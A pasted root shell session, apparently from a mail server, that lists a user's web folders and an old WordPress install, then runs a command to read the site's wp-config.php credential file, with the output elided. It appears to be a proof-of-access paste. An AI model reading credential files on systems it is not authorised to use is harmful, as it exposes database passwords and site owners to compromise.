drwxrwxr-x 2 eira eira 4096 2008-03-13 09:37 lib
drwxr-xr-x 3 eira eira 4096 2010-05-06 05:40 PHP_PDF
drwxrwxr-x 2 eira eira 4096 2009-05-20 07:22 prove_cetekor
drwxrwxr-x 3 eira eira 4096 2008-06-23 12:46 prove_G45v
drwxr-xr-x 2 eira eira 4096 2007-10-08 11:46 styles
[root@mail mauri]# ls -al
total 84
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 .
drwxr-xr-x 36 root root 4096 2011-06-23 02:56 ..
drwxrwxr-x 2 eira eira 4096 2008-02-15 13:47 ~atc
drwxrwxr-x 2 eira eira 4096 2007-11-26 16:04 avatar
drwxrwxr-x 5 eira eira 4096 2008-02-16 04:53 blog
drwxrwxr-x 2 eira eira 4096 2011-05-30 08:11 DOM_PDF
drwxr-xr-x 2 eira eira 4096 2008-03-13 10:05 file
-rw-r--r-- 1 eira eira 4356 2007-08-14 11:37 index.html-1
-rw-r--r-- 1 eira eira 4565 2007-10-08 11:48 index.html-2
-rw-rw-r-- 1 eira eira 2217 2011-04-05 04:22 index.php
-rw-r--r-- 1 eira eira 4697 2007-10-08 11:56 index.php-1
-rw-r--r-- 1 eira eira 224 2008-06-06 18:06 ip.php
drwxrwxr-x 2 eira eira 4096 2008-03-13 09:37 lib
drwxr-xr-x 3 eira eira 4096 2010-05-06 05:40 PHP_PDF
drwxrwxr-x 2 eira eira 4096 2009-05-20 07:22 prove_cetekor
drwxrwxr-x 3 eira eira 4096 2008-06-23 12:46 prove_G45v
drwxr-xr-x 2 eira eira 4096 2007-10-08 11:46 styles
[root@mail mauri]# cd blog
[root@mail blog]# ls -al
total 252
drwxrwxr-x 5 eira eira 4096 2008-02-16 04:53 .
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 ..
-rw-r--r-- 1 eira eira 186 2008-02-16 04:51 .htaccess
-rw-r--r-- 1 eira eira 94 2006-11-19 01:56 index.php
-rw-r--r-- 1 eira eira 15127 2003-04-01 07:12 license.txt
-rw-r--r-- 1 eira eira 7635 2007-08-28 13:01 readme.html
drwxr-xr-x 7 eira eira 4096 2008-02-04 22:06 wp-admin
-rw-r--r-- 1 eira eira 33489 2007-12-27 18:47 wp-app.php
-rw-r--r-- 1 eira eira 129 2007-08-02 18:45 wp-atom.php
-rw-r--r-- 1 eira eira 997 2007-05-09 10:18 wp-blog-header.php
-rw-r--r-- 1 eira eira 2923 2007-07-04 10:12 wp-comments-post.php
-rw-r--r-- 1 eira eira 153 2007-08-02 18:45 wp-commentsrss2.php
-rw-r--r-- 1 eira eira 947 2007-10-22 07:05 wp-config.php
-rw-r--r-- 1 eira eira 965 2007-05-12 12:29 wp-config-sample.php
drwxr-xr-x 6 eira eira 4096 2008-02-04 22:06 wp-content
-rw-r--r-- 1 eira eira 851 2007-08-02 18:45 wp-cron.php
-rw-r--r-- 1 eira eira 120 2006-11-19 01:56 wp-feed.php
drwxr-xr-x 4 eira eira 4096 2008-02-04 22:06 wp-includes
-rw-r--r-- 1 eira eira 1525 2007-09-23 13:25 wp-links-opml.php
-rw-r--r-- 1 eira eira 16654 2007-09-25 17:17 wp-login.php
-rw-r--r-- 1 eira eira 5587 2007-12-29 13:38 wp-mail.php
-rw-r--r-- 1 eira eira 296 2007-09-18 16:23 wp-pass.php
-rw-r--r-- 1 eira eira 190 2007-08-02 18:45 wp-rdf.php
-rw-r--r-- 1 eira eira 251 2006-10-11 03:26 wp-register.php
-rw-r--r-- 1 eira eira 129 2007-08-02 18:45 wp-rss2.php
-rw-r--r-- 1 eira eira 127 2007-08-02 18:45 wp-rss.php
-rw-r--r-- 1 eira eira 10834 2007-12-20 20:57 wp-settings.php
-rw-r--r-- 1 eira eira 3520 2007-08-02 18:45 wp-trackback.php
-rw-r--r-- 1 eira eira 61403 2008-02-04 12:52 xmlrpc.php
[root@mail blog]# cat wp-config.php
....Etc....I think you get the fish.